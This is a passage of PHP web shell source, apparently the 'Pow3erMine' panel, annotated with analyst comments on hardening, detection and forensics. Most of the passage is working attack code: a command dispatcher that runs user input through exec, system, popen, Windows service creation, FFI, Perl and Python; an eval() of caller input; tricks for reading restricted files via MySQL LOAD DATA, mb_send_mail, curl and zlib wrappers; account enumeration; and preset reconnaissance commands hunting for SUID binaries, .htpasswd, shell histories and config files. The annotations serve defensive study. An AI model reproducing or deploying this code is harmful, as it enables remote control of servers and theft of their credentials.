  1742. $content = file_get_contents($tempFile);
  1743. unlink($tempFile);
  1744. return $content;
  1745. }
  1746. }
  1747. function MySQLReader($path) {
        // Reads a local file through the database client: connects with the credentials configured
        // in $DBhost/$DBuser/$DBpass, creates a scratch database and table named "a",
        // loads $path into it with LOAD DATA LOCAL INFILE, prints each row and drops the database.
        // $path is concatenated into the SQL text; addslashes() is applied only when magic quotes are on.
        // Hardening note: disabling local_infile on the MySQL server and mysqli.allow_local_infile in php.ini
        // removes this primitive; CREATE DATABASE a / DROP DATABASE a in the query log is a usable indicator.
        // The mysql_* extension used here was removed in PHP 7.0.
  1748. global $DBhost,$DBuser,$DBpass;
  1749. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  1750. $con = mysql_connect($DBhost,$DBuser,$DBpass);
  1751. mysql_query("CREATE DATABASE a");
  1752. mysql_query("CREATE TABLE a.a (a varchar(1024))");
  1753. mysql_query("GRANT SELECT,INSERT ON a.a TO '".$DBuser."'");
  1754. mysql_query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a") or die(mysql_error());
  1755. $result = mysql_query("SELECT a FROM a.a");
  1756. while(list($row) = mysql_fetch_row($result)){print $row . chr(10);}
  1757. mysql_query("DROP DATABASE a");
  1758. }
  1759. function MySQLIReader($path) {
        // mysqli variant of MySQLReader(): creates the scratch database/table "a" over a mysql_* connection,
        // then opens a mysqli connection with MYSQLI_OPT_LOCAL_INFILE enabled and registers r() as the
        // local-infile handler, so the file's bytes are printed as the client reads them.
        // Unlike MySQLReader(), the scratch database is not dropped afterwards, so database "a" is left behind.
        // r() is declared as a named function inside this body; PHP defines it globally on the first call.
        // Hardening note: mysqli.allow_local_infile=Off in php.ini and local_infile=OFF on the server block this.
  1760. global $DBhost,$DBuser,$DBpass;
  1761. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  1762. $con = mysql_connect($DBhost,$DBuser,$DBpass);
  1763. mysql_query("CREATE DATABASE a");
  1764. mysql_query("CREATE TABLE a.a (a varchar(1024))");
  1765.  
  1766. function r($fp, &$buf, $len, &$err) {
  1767. print fread($fp, $len);
  1768. }
  1769. $m = new mysqli($DBhost, $DBuser, $DBpass, 'a');
  1770. $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
  1771. $m->set_local_infile_handler("r");
  1772. $m->query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a");
  1773. $m->close();
  1774. }
  1775. function DBConnect($host,$user,$pass,$db) {
        // Opens a persistent mysql_* connection and selects $db.
        // Returns true on success and false on failure; the second "return $connect" is unreachable,
        // so callers never receive the connection resource.
        // Review note: the failure message echoes host, user and password into the page.
  1776. $connect = mysql_pconnect($host,$user,$pass);
  1777. if(!$connect){echo "Can't Connect to [ ".$host." ] [ ".$user." ] [ ".$pass." ]"; return false; }
  1778. else {
  1779. $tryToSelectDB = mysql_select_db($db,$connect);
  1780. if(!$tryToSelectDB){echo "Can't Enter The Database [ ".$db." ]"; return false; }
  1781. else{return true; return $connect;}
  1782. }
  1783. }
  1784. function ReadId($path) {
        // Account enumeration through the POSIX extension: calls posix_getpwuid() for every uid
        // from 0 to 59999 and concatenates the fields of each entry found into one string, which is returned.
        // $path is accepted but not used. eah() is not defined in the visible part of the file.
        // Hardening note: posix_getpwuid can be listed in disable_functions where the application does not need it.
  1785. for($uid=0;$uid<60000;$uid++) {
  1786. $ara = posix_getpwuid($uid);
  1787. if (!empty($ara)){while (list ($key, $val) = eah($ara)){$content .= $val;}
  1788. }
  1789. }
  1790. return $content;
  1791. }
  1792. function ImapF($path) {
        // Uses the IMAP extension as a file reader: opens $path as a mailbox with empty credentials
        // and returns the body of message number 1.
        // No check is made that imap_open() succeeded before the stream is used.
  1793. $stream = imap_open($path, "", "");
  1794. $str = imap_body($stream, 1);
  1795. imap_close($stream);
  1796. return $str;
  1797. }
  1798. function FileF($path) {
        // Reads $path with file() and returns the lines joined back into one string.
        // $content is appended to without being initialised first.
  1799. $lines = file($path); foreach($lines as $line){$content .= $line;}
  1800. return $content;
  1801. }
  1802. function CopyF($path) {
        // Reads $path by copying it to a temporary file in the current directory,
        // reading the copy and deleting it. Returns the contents.
        // Forensic note: the temporary name is an MD5 hex string followed by ".bb",
        // a pattern that file-integrity monitoring on the web root can match.
  1803. $tempFile = md5(uniqid()).".bb";
  1804. copy($path,$tempFile);
  1805. $content = file_get_contents($tempFile);
  1806. unlink($tempFile);
  1807. return $content;
  1808. }
  1809. function fgetssF($path) {
        // Accumulates lines returned by fgetss() (fgets with tag stripping) until it returns a falsy value.
        // fgetss() is called with $path itself; no fopen() is visible here, so whether the caller passes
        // a handle or a path string cannot be told from this block.
        // fgetss() was removed in PHP 8.0.
  1810. while(($line = fgetss($path)) != false){$content .= $line;}
  1811. return $content;
  1812. }
  1813. function highlightFile($path) {
        // Thin wrapper around highlight_file(). Called with one argument, highlight_file() prints the
        // syntax-highlighted source directly, so the value returned here is its boolean status, not the text.
  1814. return highlight_file($path);
  1815. }
  1816. function mbSendEmail($path) {
        // Abuses the mail transport as a file reader: builds an additional-parameters string from $path
        // and a uniqid()-named file in the current directory, passes it as the fifth argument of
        // mb_send_mail(), then reads that file back, deletes it and returns the contents.
        // Falls through without a return value when mb_send_mail() is not available.
        // Hardening note: the fifth argument is handed to the mail binary's command line; where the
        // application sends no mail, listing mail and mb_send_mail in disable_functions closes this path.
  1817. if(function_exists('mb_send_mail')) {
  1818. $tempFile = uniqid();
  1819. $additional_param = "-C ".$path." -X ".getcwd()."/".$tempFile;
  1820. mb_send_mail("email@example.com", NULL, NULL, NULL, $additional_param);
  1821. $content = file_get_contents($tempFile);
  1822. unlink($tempFile);
  1823. return $content;
  1824. }
  1825. }
  1826. function DeleteFile($fileName) {
        // Deletes $fileName with unlink(); if that did not succeed, falls back to a shell command
        // through Exe() ("del" on Windows, "rm -f" otherwise). Returns true or false.
        // $fileName is interpolated into the shell command without quoting.
        // Exe() in this file has no return statement, so after the fallback $delete is presumably
        // still falsy and false is returned even if the shell command worked.
  1827. global $os;
  1828. if(function_exists('unlink'))
  1829. {$delete = unlink($fileName);}
  1830. if((!$delete) && ($os == 'Windows'))
  1831. {$delete = Exe("del $fileName"); }
  1832. else if((!$delete) && ($os == 'Linux'))
  1833. {$delete = Exe("rm -f $fileName");}
  1834. if($delete){return true;}else{return false;}
  1835. }
  1836. function CurlFileRead($path) {
        // Reads a local file through the cURL extension using a file:// URL and dumps the result of
        // curl_exec() with var_dump(). The URL has a NUL byte and this script's own path appended,
        // presumably aimed at path checks in legacy PHP/cURL builds.
        // The handle is never closed and nothing is returned.
        // Hardening note: applications that need cURL can restrict it to http/https with CURLOPT_PROTOCOLS.
  1837. $ch = curl_init("file://".$path."\x00".__FILE__);
  1838. var_dump(curl_exec($ch));
  1839. }
  1840. function FReadF($path) {
        // Opens $path read/write ('r+') and calls fread() on it. As written, filesize() receives the
        // handle rather than the path, and the htmlspecialchars() result is neither echoed nor returned,
        // so this function produces no output and returns nothing.
  1841. $file = fopen($path,'r+'); //Open The File
  1842. if(function_exists('fread')){htmlspecialchars(fread($file,filesize($file)));}
  1843. fclose($file);
  1844. }
  1845. function TempnameF($path) {
        // Reads $path through the compress.zlib:// stream wrapper: copies it into a tempnam() file
        // (prefix "cx") created in the global $dir, reads the copy, deletes it and returns the contents
        // HTML-escaped with line breaks converted to <br>.
        // $filename is not defined in this function, so the two htmlspecialchars($filename) calls add nothing.
        // Falls through without a return value when copy() fails; the tempnam() file is then left behind.
        // Forensic note: files named "cx" plus a random suffix appearing in web directories.
  1846. global $dir;
  1847. $temp = tempnam($dir, "cx");
  1848. if(copy("compress.zlib://".$path, $temp)) {
  1849. $handler = fopen($temp, "r");
  1850. $readFile = fread($handler, @filesize($temp));
  1851. fclose($handler);
  1852. $content .= htmlspecialchars($filename);
  1853. $content .= nl2br(htmlspecialchars($readFile));
  1854. $content .= htmlspecialchars($filename);
  1855. unlink($temp);
  1856. return $content;
  1857. }
  1858. }
  1859. function Evaluation($eval) {
        // Strips PHP open/close tags from $eval and passes the rest to eval().
        // Returns true when the evaluated code itself returns a truthy value, false otherwise.
        // SECURITY: eval() of a caller-supplied string is arbitrary code execution. The call site is
        // outside this view; presumably it is fed from the PHP_Line form field.
        // Detection note: eval() applied to a variable is one of the first patterns static web-shell scanners flag.
  1860. $eval = str_replace(array("<?php","<?","?>"),"",$eval);
  1861. $eval = eval($eval);
  1862. if($eval){return true;}else{return false;}
  1863. }
  1864. function Oracle() {
        // Capability probe: returns an HTML label saying whether ocilogon() (Oracle client) exists.
        // "ON" is rendered red and "OFF" green.
  1865. if(function_exists('ocilogon')){$oracle = '<font color="red">ON</font>';}
  1866. else {$oracle = '<font color="green">OFF</font>';}return $oracle;
  1867. }
  1868. function MsSQL() {
        // Capability probe: returns an HTML ON/OFF label for the presence of mssql_connect().
  1869. if(function_exists('mssql_connect')){$msSQL = '<font color="red">ON</font>';}
  1870. else {$msSQL = '<font color="green">OFF</font>';}return $msSQL;
  1871. }
  1872. function MySQL2() {
        // Capability probe: returns an HTML ON/OFF label for the presence of mysql_connect().
  1873. $mysql_try = function_exists('mysql_connect');
  1874. if($mysql_try){$mysql = '<font color="red">ON</font>';}
  1875. else {$mysql = '<font color="green">OFF</font>';}return $mysql;
  1876. }
  1877. function MSQL() {
        // Capability probe: returns an HTML ON/OFF label for the presence of msql_connect().
  1878. if (function_exists('msql_connect')){$mSql = '<font color="red">ON</font>';}
  1879. else {$mSql = '<font color="green">OFF</font>';}return $mSql;
  1880. }
  1881. function MysqlI() {
        // Capability probe: returns an HTML ON/OFF label for the presence of mysqli_connect().
  1882. if (function_exists('mysqli_connect')){$mysqli = '<font color="red">ON</font>';}
  1883. else {$mysqli = '<font color="green">OFF</font>';}return $mysqli;
  1884. }
  1885. function Gzip() {
        // Capability probe: returns an HTML ON/OFF label for the presence of gzencode().
  1886. if (function_exists('gzencode')){$gzip = '<font color="red">ON</font>';}
  1887. else {$gzip = '<font color="green">OFF</font>';}return $gzip;
  1888. }
  1889. function openBaseDir() {
        // Reports whether the open_basedir ini setting is non-empty, as an HTML ON/OFF label.
        // The configured directory list itself is not shown, only whether a restriction exists.
  1890. $openBaseDir = ini_get("open_basedir");
  1891. if (!$openBaseDir){$openBaseDir = '<font color="green">OFF</font>';}
  1892. else {$openBaseDir = '<font color="red">ON</font>';}
  1893. return $openBaseDir;
  1894. }
  1895. function Curl() {
        // Capability probe: returns an HTML ON/OFF label for whether the curl extension is loaded.
  1896. if(extension_loaded('curl')){$curl = '<font color="red">ON</font>';}
  1897. else{$curl = '<font color="green">OFF</font>';}return $curl;
  1898. }
  1899. function magicQouts() {
        // Reports the magic_quotes_gpc state as an HTML ON/OFF label.
        // Guards the call with function_exists(), so it reports OFF where get_magic_quotes_gpc() is absent.
  1900. if(function_exists('get_magic_quotes_gpc')){$mag = get_magic_quotes_gpc();}
  1901. if (empty($mag)){$mag = '<font color="green">OFF</font>';}
  1902. else {$mag= '<font color="red">ON</font>';}return $mag;
  1903. }
  1904. function SafeMode() {
        // Reports the safe_mode ini setting as an HTML ON/OFF label.
  1905. $safe_mode = ini_get("safe_mode");
  1906. if (!$safe_mode){$safe_mode = '<font color="green">OFF</font>';}
  1907. else {$safe_mode = '<font color="red">ON</font>';}
  1908. return $safe_mode;
  1909. }
  1910. function DisableFunctions() {
        // Returns the raw disable_functions ini value, or a green "NONE" label when it is empty.
        // Hardening note: an empty list means every execution and file primitive used elsewhere in this
        // file is callable; a populated disable_functions is one of the main controls against this panel.
  1911. $disfun = ini_get('disable_functions');
  1912. if (empty($disfun)){$disfun = '<font color="green">NONE</font>';}return $disfun;
  1913. }
  1914. function RegisterGlobals() {
        // Reports the register_globals ini setting as an HTML ON/OFF label.
  1915. if(ini_get('register_globals')){$registerg= '<font color="red">ON</font>';}
  1916. else{$registerg= '<font color="green">OFF</font>';}return $registerg;
  1917. }
  1918. function GetRealIP() {
        // Returns the viewer's address, preferring the X-Forwarded-For header, then Client-IP,
        // then REMOTE_ADDR. The first two are request headers and therefore client-controlled.
        // The environment names are written as bare constants rather than quoted strings.
  1919. if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);}
  1920. elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);}
  1921. else {$ip=getenv(REMOTE_ADDR);}
  1922. return $ip;
  1923. }
  1924. function SelectCommand($os) {
        // Echoes the "alias" <select> of preset commands for the Command Line form and returns nothing.
        // The $os parameter is immediately shadowed by the global of the same name.
        // Detection note: the presets are reconnaissance commands (SUID/SGID and world-writable searches,
        // lookups for configuration, password and shell-history files, network and account listings).
        // These exact command lines spawned by the web server or PHP worker account are useful hunting leads.
  1925. global $os;
  1926. if($os == 'Windows') {
  1927. echo "
  1928. <select name='alias' id='alias' onChange='AddAlias();' >
  1929. <option value=''>NONE</option>
  1930. <option value='dir' >List Directory</option>
  1931. <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
  1932. <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</option>
  1933. <option value='netstat -an'>Show active connections</option>
  1934. <option value='net start'>Show running services</option>
  1935. <option value='tasklist'>Show Pro</option>
  1936. <option value='net user'>User accounts</option>
  1937. <option value='net view'>Show computers</option>
  1938. <option value='arp -a'>ARP Table</option>
  1939. <option value='ipconfig /all'>IP Configuration</option>
  1940. <option value='netstat -an'>netstat -an</option>
  1941. <option value='systeminfo'>System Informations</option>
  1942. <option value='getmac'>Get Mac Address</option>
  1943. </select>
  1944. ";
  1945. }
  1946. else {
  1947. echo "
  1948. <select name='alias' id='alias' onChange='AddAlias();' >
  1949. <option value=''>NONE</option>
  1950. <option value='ls -la'>List dir</option>
  1951. <option value='cat /etc/hosts'>IP Addresses</option>
  1952. <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
  1953. <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
  1954. <option value='netstat -an | grep -i listen'>show opened ports</option>
  1955. <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
  1956. <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
  1957. <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
  1958. <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
  1959. <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
  1960. <option value='find / -type f -name \"config*\"'>find config* files</option>
  1961. <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
  1962. <option value='find / -perm -2 -ls'>find all writable folders and files</option>
  1963. <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
  1964. <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
  1965. <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
  1966. <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
  1967. <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
  1968. <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
  1969. <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
  1970. <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
  1971. <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
  1972. <option value='locate httpd.conf'>locate httpd.conf files</option>
  1973. <option value='locate vhosts.conf'>locate vhosts.conf files</option>
  1974. <option value='locate proftpd.conf'>locate proftpd.conf files</option>
  1975. <option value='locate psybnc.conf'>locate psybnc.conf files</option>
  1976. <option value='locate my.conf'>locate my.conf files</option>
  1977. <option value='locate admin.php'>locate admin.php files</option>
  1978. <option value='locate cfg.php'>locate cfg.php files</option>
  1979. <option value='locate conf.php'>locate conf.php files</option>
  1980. <option value='locate config.dat'>locate config.dat files</option>
  1981. <option value='locate config.php'>locate config.php files</option>
  1982. <option value='locate config.inc'>locate config.inc files</option>
  1983. <option value='locate config.inc.php'>locate config.inc.php</option>
  1984. <option value='locate config.default.php'>locate config.default.php files</option>
  1985. <option value='locate config'>locate config* files </option>
  1986. <option value='locate \".conf\"'>locate .conf files</option>
  1987. <option value='locate \".pwd\"'>locate .pwd files</option>
  1988. <option value='locate \".sql\"'>locate .sql files</option>
  1989. <option value='locate \".htpasswd\"'>locate .htpasswd files</option>
  1990. <option value='locate \".bash_history\"'>locate .bash_history files</option>
  1991. <option value='locate \".mysql_history\"'>locate .mysql_history files</option>
  1992. <option value='locate \".fetchmailrc\"'>locate .fetchmailrc files</option>
  1993. <option value='locate backup'>locate backup files</option>
  1994. <option value='locate dump'>locate dump files</option>
  1995. <option value='locate priv'>locate priv files</option>
  1996. </select>
  1997. ";
  1998. }
  1999. }
  2000. function CSS($sh3llColor) {
        // Builds and returns the page's <style> block plus an inline <script> as one string.
        // $sh3llColor is interpolated as the accent colour for text, input borders and links.
        // The script defines four UI helpers: openPHPInfo() (opens ?info=getPhpInfo in a popup),
        // AddAlias() (copies the alias select into CMD_Line), addUploadInput() (appends a file input)
        // and change_dir_mode() (reloads the page with ?dir_mode=...).
        // Detection note: GET requests carrying info= or dir_mode= are the query strings this panel
        // generates and, unlike its POST fields, they appear in ordinary access logs.
  2001. $css = "
  2002. <style>
  2003. BODY
  2004. {
  2005. FONT-FAMILY: Verdana;
  2006. margin: 2;
  2007. background-color: #000000;
  2008. color:white;
  2009. font-size:10pt;
  2010. }
  2011. sy
  2012. {
  2013. color:".$sh3llColor.";
  2014. font-size:7pt;
  2015. }
  2016. #Box
  2017. {
  2018. color:".$sh3llColor.";
  2019. background-color:#000;
  2020. font-size:14px;
  2021. font-weight:bold;
  2022.  
  2023. border:none;
  2024. }
  2025. table
  2026. {
  2027. border:none;
  2028. BORDER: #eeeeee outset;
  2029. BACKGROUND-COLOR: #000000;
  2030. color: #cccccc;
  2031. font-size:10px;
  2032. }
  2033. tr
  2034. {
  2035. BORDER-RIGHT: #cccccc 1px solid;
  2036. BORDER-TOP: #cccccc 1px solid;
  2037. BORDER-LEFT: #cccccc 1px solid;
  2038. BORDER-BOTTOM: #cccccc 1px solid;
  2039. color: #ffffff;
  2040. }
  2041. td
  2042. {
  2043. BORDER-RIGHT: #cccccc 1px solid;
  2044. BORDER-TOP: #cccccc 1px solid;
  2045. BORDER-LEFT: #cccccc 1px solid;
  2046. BORDER-BOTTOM: #cccccc 1px solid;
  2047. color: #cccccc;
  2048. }
  2049.  
  2050. input
  2051. {
  2052. BORDER-RIGHT: ".$sh3llColor." 1px solid;
  2053. BORDER-TOP: ".$sh3llColor." 1px solid;
  2054. BORDER-LEFT: ".$sh3llColor." 1px solid;
  2055. BORDER-BOTTOM: ".$sh3llColor." 1px solid;
  2056. BACKGROUND-COLOR: #333333;
  2057. font: 9pt tahoma;
  2058. color: #ffffff;
  2059. }
  2060. select
  2061. {
  2062. BORDER-RIGHT: #ffffff 1px solid;
  2063. BORDER-TOP: #999999 1px solid;
  2064. BORDER-LEFT: #999999 1px solid;
  2065. BORDER-BOTTOM: #ffffff 1px solid;
  2066. BACKGROUND-COLOR: #000000;
  2067. font: 9pt tahoma;
  2068. color: #CCCCCC;;
  2069. }
  2070. submit
  2071. {
  2072. BORDER: 1px outset buttonhighlight;
  2073. BACKGROUND-COLOR: #272727;
  2074. width: 40%;
  2075. color: #cccccc;
  2076. }
  2077. textarea
  2078. {
  2079. BORDER-RIGHT: #ffffff 1px solid;
  2080. BORDER-TOP: #999999 1px solid;
  2081. BORDER-LEFT: #999999 1px solid;
  2082. BORDER-BOTTOM: #ffffff 1px solid;
  2083. BACKGROUND-COLOR: #333333;
  2084. color: #ffffff;
  2085. }
  2086. .Save{
  2087. width:500px;
  2088. border-color:red;
  2089. }
  2090. A:link {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  2091. A:visited { COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  2092. A:active {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  2093. A:hover {color:blue;TEXT-DECORATION: none;}
  2094. </style>
  2095. <script>
  2096. function openPHPInfo(){my_window= window.open (\"?info=getPhpInfo\",\"PHP Info\",\"width=800,height=600,scrollbars=1\"); }
  2097. function AddAlias(){document.getElementById('CMD_Line').value = document.getElementById('alias').value; }
  2098. function addUploadInput(){document.getElementById('uploadInput').innerHTML += '<input type=\'file\' name=\'uploadfile[]\'>'; }
  2099. function change_dir_mode() {
  2100. var dir_mode = document.getElementById('dir_mode').value;
  2101. document.location = '?dir_mode='+dir_mode;
  2102. }
  2103. </script>
  2104. ";
  2105. return $css;
  2106. }
  2107. function filter($string) {
        // Undoes magic-quotes escaping: returns stripslashes($string) when magic_quotes_gpc is on,
        // otherwise returns $string unchanged.
        // Despite the name, this performs no validation or sanitisation; request values passed
        // through it reach their sinks exactly as the client sent them.
  2108. if(get_magic_quotes_gpc() != 0){return stripslashes($string); }
  2109. else{return $string; }
  2110. }
  2111. function footer() {
        // Echoes the closing footer table and the </body></html> tags; returns nothing.
        // Detection note: the branding and contact strings below are fixed literals, which makes them
        // convenient static signatures for file scanners looking for this family in a web root.
  2112. echo '
  2113. <table width="100%">
  2114. <tr>
  2115. <td width="100%"><center>
  2116. <sy> ? </sy>Copyright © 2002-2014 Pow3erMine - All rights reserved.<sy> ?</sy></b><br/>
  2117.  
  2118. <sy> ? </sy>Skype: Pow3rMine | Email: onlinestresser@gmail.com<sy> ?</sy></b>
  2119. </center></td>
  2120. </tr>
  2121. </table>
  2122. </body></html>
  2123. ';
  2124. }
  2125. function print_exe_method() {
        // Prints the exe_method <select> for the Command Line form, pre-selecting the current
        // $exec_method. The Linux list offers eight execution back-ends; the other branch adds
        // Windows-specific ones. Output is written directly (the function drops out of PHP mode)
        // and nothing is returned.
        // Detection note: the option values are the literal strings sent in the exe_method POST field.
  2126. global $os; global $exec_method;
  2127. if($os == "Linux") {
  2128. ?>
  2129. <select name="exe_method" >
  2130. <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
  2131. <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system</option>
  2132. <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec</option>
  2133. <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
  2134. <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
  2135. <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
  2136. <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
  2137. <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
  2138. </select>
  2139. <?php
  2140. } else {
  2141. ?>
  2142. <select name="exe_method" >
  2143. <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
  2144. <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system()</option>
  2145. <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec()</option>
  2146. <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
  2147. <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
  2148. <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
  2149. <option value="win_shell_execute" <?php if($exec_method == "win_shell_execute") {echo "selected";} ?>>win_shell_execute()</option>
  2150. <option value="win32_create_service" <?php if($exec_method == "win32_create_service") {echo "selected";} ?>>win32_create_service()</option>
  2151. <option value="ffi" <?php if($exec_method == "ffi") {echo "selected";} ?>>ffi</option>
  2152. <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
  2153. <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
  2154. <option value="slash_bypass <?php if($exec_method == "slash_bypass") {echo "selected";} ?>">slash bypass</option>
  2155. </select>
  2156. <?php
  2157. }
  2158. }
  2159. function Exe($command) {
        // Central command dispatcher: passes $command through filter() (which only undoes magic
        // quotes) and runs it with the back-end named by the global $exec_method, which the top of
        // the file takes from the exe_method POST field (default "exec"). Output is echoed or
        // streamed to the response; the function has no return statement.
        // SECURITY: $command reaches the operating system shell unmodified in every branch.
        // Hardening note: a disable_functions list covering exec, system, shell_exec, passthru,
        // proc_open and popen blocks the core branches; the remaining ones depend on optional
        // extensions (perl, python, ffi, win32 service functions) being loaded.
        // Detection note: the web server or PHP worker process spawning a shell or command interpreter
        // is the host-level signal all of these branches share.
  2160. global $dir;global $os;global $exec_method;
  2161. $command = filter($command);
  2162.  
  2163. if($exec_method == "exec") {
  2164. exec($command,$output);echo join("\n",$output);
  2165. } else if($exec_method == "system") {
  2166. system($command);
  2167. } else if($exec_method == "shell_exec") {
  2168. echo shell_exec($command);
  2169. } else if($exec_method == "passthru") {
  2170. passthru($command);
  2171. } else if($exec_method == "proc_open") {
  2172. echo proc_exec($command,$dir);
  2173. } else if($exec_method == "popen") {
  2174. $fp = popen($command,"r");{while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}echo convert_cyr_string($result,"d","w");
  2175. } else if($exec_method == "win_shell_execute") {
  2176. echo winshell($command);
  2177. } else if($exec_method == "win32_create_service") {
  2178. echo srvshell($command);
  2179. } else if($exec_method == "ffi") {
  2180. echo ffishell($command);
  2181. } else if($exec_method == "perl") {
  2182. echo perlshell($command);
  2183. } else if($exec_method == "python") {
  2184. echo python_eval("import os\nos.system('".$command."')");
  2185. } else if($exec_method == "slash_bypass") {
  2186. echo slashBypass($command);
  2187. }
  2188. }
  2189. function proc_exec($com , $dir) {
        // Runs $com with proc_open() using $dir as the working directory and returns whatever the
        // child wrote to descriptor 1 (stdout). Descriptors 0 and 1 are both declared as pipe "w".
        // The process handle and pipes are never closed, and a failed proc_open() is not checked.
  2190. $start_pipe=array(0=>array("pipe","w"),1=>array("pipe","w"));
  2191. $process=proc_open($com,$start_pipe,$pipes,$dir,NULL);
  2192. return stream_get_contents($pipes[1]);
  2193. }
  2194. function winshell($command) {
        // Windows back-end: runs the command through cmd.exe via win_shell_execute(), redirecting
        // output to a file named "NJ" + uniqid() in the directory returned by whereistmP()
        // (defined outside this view), waits one second, reads the file, deletes it and returns the text.
        // Forensic note: short-lived "NJ"-prefixed files in the temp directory, and cmd.exe started
        // by the web server process.
  2195. $name=whereistmP()."\\".uniqid('NJ');
  2196. win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
  2197. sleep(1);
  2198. $exec=file_get_contents($name);
  2199. DeleteFile($name);
  2200. return $exec;
  2201. }
  2202. function srvshell($command) {
        // Windows back-end that runs the command as a throw-away service: creates a service with a
        // random "NJ" + uniqid() name whose binary is the command interpreter (ComSpec, or a hard-coded
        // cmd.exe path) and whose parameters redirect the command's output to a temp file, then starts,
        // stops and deletes the service, polls until the output file exists, reads it, deletes it
        // and returns the text.
        // Detection note: service creation and deletion within seconds, with a random "NJ"-prefixed name
        // and cmd.exe as the image path, is visible in service-installation events
        // (Event ID 7045 in the Windows System log).
        // The polling loop has no timeout.
  2203. $name=whereistmP()."\\".uniqid('NJ');
  2204. $n=uniqid('NJ');
  2205. $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
  2206. win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
  2207. win32_start_service($n);
  2208. win32_stop_service($n);
  2209. win32_delete_service($n);
  2210. while(!file_exists($name))sleep(1);
  2211. $exec=file_get_contents($name);
  2212. DeleteFile($name);
  2213. return $exec;
  2214. }
  2215. function ffishell($command) {
        // Windows back-end using a foreign-function interface: binds WinExec from kernel32.dll through
        // an ffi object and uses it to start cmd.exe with output redirected to an "NJ" + uniqid() temp
        // file, then polls until the file exists, reads it, deletes it and returns the text.
        // Hardening note: this only works where an FFI extension is loaded and enabled for web requests.
        // The polling loop has no timeout.
  2216. $name=whereistmP()."\\".uniqid('NJ');
  2217. $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  2218. $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
  2219. while(!file_exists($name))sleep(1);
  2220. $exec=file_get_contents($name);
  2221. DeleteFile($name);
  2222. return $exec;
  2223. }
  2224. function perlshell($command) {
        // Back-end using the embedded-Perl extension: evaluates a Perl system() call containing
        // $command and captures what it prints with output buffering. Returns the captured text.
        // $command is placed between single quotes in the Perl source without escaping.
  2225. $perl=new perl();
  2226. ob_start();
  2227. $perl->eval("system('".$command."')");
  2228. $exec=ob_get_contents();
  2229. ob_end_clean();
  2230. return $exec;
  2231. }
  2232. function slashBypass($cmd) {
        // Windows back-end that writes the command into cmd.bat (output redirected to sy3.txt),
        // launches the batch file through exec(), then reads sy3.txt, deletes it and returns the text.
        // Forensic note: cmd.bat is not removed, so it remains in the working directory together with
        // the command it contained; sy3.txt exists only briefly.
  2233. GenerateFile("cmd.bat","$cmd>sy3.txt"."\r\n exit");
  2234. exec("\start cmd.bat");
  2235. $content = file_get_contents('sy3.txt');
  2236. unlink('sy3.txt');
  2237. return $content;
  2238. }
  2239. function GenerateFile($name,$content) {
        // Creates or truncates $name ("w+") and writes $content using whichever of fwrite(), fputs()
        // or file_put_contents() exists. Returns true on success and false when the open or write fails;
        // falls through without a return value when fopen()/fclose() are unavailable.
        // On a failed or zero-byte write the function returns before fclose(), leaving the handle open.
        // The file_put_contents() fallback is given the open handle rather than the file name.
  2240. if(function_exists('fopen') && function_exists('fclose')) {
  2241. $file = fopen($name,"w+");
  2242. if($file) {
  2243. if(function_exists('fwrite')){$writeFile = fwrite($file,$content); }
